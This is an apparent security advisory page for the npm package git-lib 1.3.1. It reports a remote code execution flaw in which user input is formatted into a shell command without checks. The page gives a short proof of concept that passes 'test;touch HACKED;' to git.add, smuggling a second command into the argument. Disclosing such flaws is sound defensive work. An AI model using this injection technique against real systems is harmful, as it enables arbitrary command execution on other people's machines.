git-lib@1.3.1

Vulnerabilities

1 via 1 paths

Dependencies

4

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0

medium severity

Remote Code Execution (RCE)

  • Vulnerable module: git-lib
  • Introduced through: git-lib@1.3.1

Detailed paths

  • Introduced through: git-lib@1.3.1

Overview

git-lib is an a library with different git commands for uses.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). A user input is formatted inside a command that will be executed without any check.

PoC by mik317

  • Create the following PoC file:
// poc.js
var git = require("git-lib");

git.add("test;touch HACKED;").then(function(){
    /** successfully added **/
}).catch(function(err){
    /** unsuccessful **/
});
  • Check there aren't files called HACKED
  • Execute the following commands in another terminal:
npm i git-lib # Install affected module
git init # Avoid problems with *git*
node poc.js #  Run the PoC
  • Recheck the files: now HACKED has been created

    Remediation

    There is no fixed version for git-lib.

    References